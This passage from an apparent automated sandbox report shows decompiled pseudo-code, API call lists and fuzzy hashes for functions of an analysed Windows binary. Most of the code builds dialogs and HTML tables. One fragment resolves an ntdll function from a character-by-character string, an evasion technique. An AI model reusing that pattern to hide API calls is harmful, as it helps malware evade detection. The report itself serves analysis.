                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                      • API String ID: 2574300362-1257427173
                                                                                      • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                      • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                      • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 63%
                                                                                      			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                      0x00407f9b
                                                                                      0x00407fa3
                                                                                      0x00407fad
                                                                                      0x00407fb9
                                                                                      0x0040802e
                                                                                      0x00408032
                                                                                      0x00408038
                                                                                      0x0040803e
                                                                                      0x00407fbb
                                                                                      0x00407fc9
                                                                                      0x00407fd0
                                                                                      0x00407fe0
                                                                                      0x00407fe5
                                                                                      0x00407ff7
                                                                                      0x00408015
                                                                                      0x0040801b
                                                                                      0x00408021
                                                                                      0x00408021
                                                                                      0x00408051
                                                                                      0x00408051
                                                                                      0x00408059
                                                                                      0x00408065
                                                                                      0x00408069
                                                                                      0x0040806f
                                                                                      0x00408087
                                                                                      0x00408087
                                                                                      0x0040809c
                                                                                      0x004080bb
                                                                                      0x004080d1
                                                                                      0x004080de
                                                                                      0x004080e2
                                                                                      0x004080ea
                                                                                      0x004080fb
                                                                                      0x00408105
                                                                                      0x00408115
                                                                                      0x00408121
                                                                                      0x00408127
                                                                                      0x00408150

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00407FD0
                                                                                      • memset.MSVCRT ref: 00407FE5
                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                      • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                      • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                      • LoadImageW.USER32 ref: 004080B4
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                      • LoadImageW.USER32 ref: 004080D1
                                                                                      • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                      • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                      • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                      • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                      • DeleteObject.GDI32(?), ref: 00408121
                                                                                      • DeleteObject.GDI32(?), ref: 00408127
                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                      • String ID:
                                                                                      • API String ID: 304928396-0
                                                                                      • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                      • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                      • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 69%
                                                                                      			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                      0x0040ae90
                                                                                      0x0040aeab
                                                                                      0x0040aeb2
                                                                                      0x0040aec0
                                                                                      0x0040aec7
                                                                                      0x0040aecc
                                                                                      0x0040aed3
                                                                                      0x0040aeda
                                                                                      0x0040aee1
                                                                                      0x0040aee1
                                                                                      0x0040aee7
                                                                                      0x0040aeea
                                                                                      0x0040aeed
                                                                                      0x0040aef9
                                                                                      0x0040aefe
                                                                                      0x0040af05
                                                                                      0x0040af07
                                                                                      0x0040af08
                                                                                      0x0040af13
                                                                                      0x0040af18
                                                                                      0x0040af19
                                                                                      0x0040af26
                                                                                      0x0040af2b
                                                                                      0x0040af2b
                                                                                      0x0040af2e
                                                                                      0x0040af34
                                                                                      0x0040af43
                                                                                      0x0040af44
                                                                                      0x0040af4f
                                                                                      0x0040af54
                                                                                      0x0040af55
                                                                                      0x0040af62
                                                                                      0x0040af67
                                                                                      0x0040af70
                                                                                      0x0040af76
                                                                                      0x0040af7a
                                                                                      0x0040af82
                                                                                      0x0040af88
                                                                                      0x0040af8d
                                                                                      0x0040af97
                                                                                      0x0040af9f
                                                                                      0x0040afa5
                                                                                      0x0040afa9
                                                                                      0x0040afb1
                                                                                      0x0040afb7
                                                                                      0x0040afbd

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                      • API String ID: 3143752011-1996832678
                                                                                      • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                      • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                      • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 97%
                                                                                      			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                      0x00403c09
                                                                                      0x00403c0c
                                                                                      0x00403c11
                                                                                      0x00403c1b
                                                                                      0x00403c3f
                                                                                      0x00403c4a
                                                                                      0x00403c6e
                                                                                      0x00403c96
                                                                                      0x00403c9a
                                                                                      0x00403ca6
                                                                                      0x00403cb3
                                                                                      0x00403cb8
                                                                                      0x00403cc5
                                                                                      0x00403cca
                                                                                      0x00403cdd
                                                                                      0x00403ce6
                                                                                      0x00403cf8
                                                                                      0x00403d11
                                                                                      0x00403d26
                                                                                      0x00403d3f
                                                                                      0x00403d54
                                                                                      0x00403d6d
                                                                                      0x00403d76
                                                                                      0x00403d88
                                                                                      0x00403d9e
                                                                                      0x00403db0
                                                                                      0x00403db5
                                                                                      0x00403dc4
                                                                                      0x00403dc8
                                                                                      0x00403dc9
                                                                                      0x00403dca
                                                                                      0x00403dda
                                                                                      0x00403ddf
                                                                                      0x00403de2
                                                                                      0x00403de3
                                                                                      0x00403df4
                                                                                      0x00403df8
                                                                                      0x00403df9
                                                                                      0x00403dfa
                                                                                      0x00403e0a
                                                                                      0x00403e0f
                                                                                      0x00403e12
                                                                                      0x00403e13
                                                                                      0x00403e22
                                                                                      0x00403e26
                                                                                      0x00403e28
                                                                                      0x00403e29
                                                                                      0x00403e39
                                                                                      0x00403e3e
                                                                                      0x00403e41
                                                                                      0x00403e42
                                                                                      0x00403e51
                                                                                      0x00403e55
                                                                                      0x00403e57
                                                                                      0x00403e58
                                                                                      0x00403e68
                                                                                      0x00403e6d
                                                                                      0x00403e70
                                                                                      0x00403e71
                                                                                      0x00403e71
                                                                                      0x00403e87
                                                                                      0x00403e8d
                                                                                      0x00403e9e
                                                                                      0x00403ea6
                                                                                      0x00403eaf
                                                                                      0x00403ebc

                                                                                      APIs
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                      • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                      • GetDlgItem.USER32 ref: 00403C2F
                                                                                      • SetWindowLongW.USER32 ref: 00403C39
                                                                                        • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                      • LoadImageW.USER32 ref: 00403C6A
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                      • LoadImageW.USER32 ref: 00403C7F
                                                                                      • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                      • GetDlgItem.USER32 ref: 00403CB0
                                                                                        • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                        • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      • GetDlgItem.USER32 ref: 00403CC2
                                                                                      • GetDlgItem.USER32 ref: 00403CD4
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • GetDlgItem.USER32 ref: 00403D64
                                                                                      • GetDlgItem.USER32 ref: 00403DC0
                                                                                      • GetDlgItem.USER32 ref: 00403DF0
                                                                                      • GetDlgItem.USER32 ref: 00403E20
                                                                                      • GetDlgItem.USER32 ref: 00403E4F
                                                                                      • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                      • GetDlgItem.USER32 ref: 00403E9B
                                                                                      • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1038210931-0
                                                                                      • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                      • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 56%
                                                                                      			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                      0x00407763
                                                                                      0x0040776c
                                                                                      0x00407784
                                                                                      0x0040778b
                                                                                      0x00407797
                                                                                      0x00407799
                                                                                      0x0040779b
                                                                                      0x004077a7
                                                                                      0x004077ae
                                                                                      0x004077bd
                                                                                      0x004077c4
                                                                                      0x004077d3
                                                                                      0x004077da
                                                                                      0x004077e1
                                                                                      0x004077e6
                                                                                      0x004077f2
                                                                                      0x004077f5
                                                                                      0x00407804
                                                                                      0x00407805
                                                                                      0x00407810
                                                                                      0x00407812
                                                                                      0x00407813
                                                                                      0x00407818
                                                                                      0x00407818
                                                                                      0x00407825
                                                                                      0x0040782d
                                                                                      0x00407830
                                                                                      0x0040783a
                                                                                      0x00407840
                                                                                      0x00407846
                                                                                      0x00407849
                                                                                      0x00407850
                                                                                      0x0040785e
                                                                                      0x00407864
                                                                                      0x00407867
                                                                                      0x0040786b
                                                                                      0x0040786f
                                                                                      0x00407877
                                                                                      0x0040787a
                                                                                      0x00407885
                                                                                      0x00407892
                                                                                      0x004078a8
                                                                                      0x004078b8
                                                                                      0x004078c5
                                                                                      0x004078ff
                                                                                      0x004078c7
                                                                                      0x004078ca
                                                                                      0x004078dd
                                                                                      0x004078de
                                                                                      0x004078e3
                                                                                      0x004078e8
                                                                                      0x004078eb
                                                                                      0x004078f0
                                                                                      0x004078f0
                                                                                      0x00407906
                                                                                      0x00407909
                                                                                      0x0040790f
                                                                                      0x0040791d
                                                                                      0x00407923
                                                                                      0x0040792d
                                                                                      0x00407932
                                                                                      0x0040793b
                                                                                      0x00407942
                                                                                      0x00407943
                                                                                      0x0040794c
                                                                                      0x00407953
                                                                                      0x00407954
                                                                                      0x00407959
                                                                                      0x0040795c
                                                                                      0x00407961
                                                                                      0x0040796c
                                                                                      0x00407971
                                                                                      0x0040797a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407838
                                                                                      0x00407838
                                                                                      0x0040783a
                                                                                      0x00407980
                                                                                      0x0040798a
                                                                                      0x004079a1

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                      • API String ID: 1607361635-601624466
                                                                                      • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                      • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 40%
                                                                                      			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
